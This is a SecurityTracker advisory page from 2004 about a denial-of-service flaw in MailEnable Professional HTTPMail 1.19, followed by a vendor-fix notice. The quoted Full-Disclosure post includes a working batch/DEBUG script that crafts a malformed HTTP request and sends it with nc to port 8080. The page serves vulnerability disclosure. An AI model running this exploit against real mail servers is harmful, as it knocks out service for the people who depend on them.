SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   MailEnable Vendors:   MailEnable Pty. Ltd.
MailEnable Professional HTTPMail Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1010837
SecurityTracker URL:  http://securitytracker.com/id/1010837
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 2 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.19
Description:   A vulnerability was reported in MailEnable Professional. A remote user can cause denial of service conditions on the HTTPMail service.

CoolICE reported that a remote user can connect to the webmail service on port 8080 and send a specially crafted HTTP GET request to cause denial of service conditions on the target system.

Impact:   A remote user can cause denial of service conditions on the HTTPMail service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.mailenable.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 9 2004 (Vendor Issues Fix) MailEnable Professional HTTPMail Bug Lets Remote Users Deny Service
The vendor has issued a fix.



 Source Message Contents

Subject:  [Full-Disclosure] DOS@MEHTTPS


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:	MailEnable Professional HTTPMail 
:Vendors:	http://www.mailenable.com/
:Version:	1.19
:Platforms:	Windows
:Bug:		D.O.S
:Date:		2004-07-30
:Author:	CoolICE
:E_mail:	CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
;set PORT=8080
;if not '%2'=='' set PORT=%2
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe 
echo Need nc.exe&&goto :eof
;DEBUG < %~s0
;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC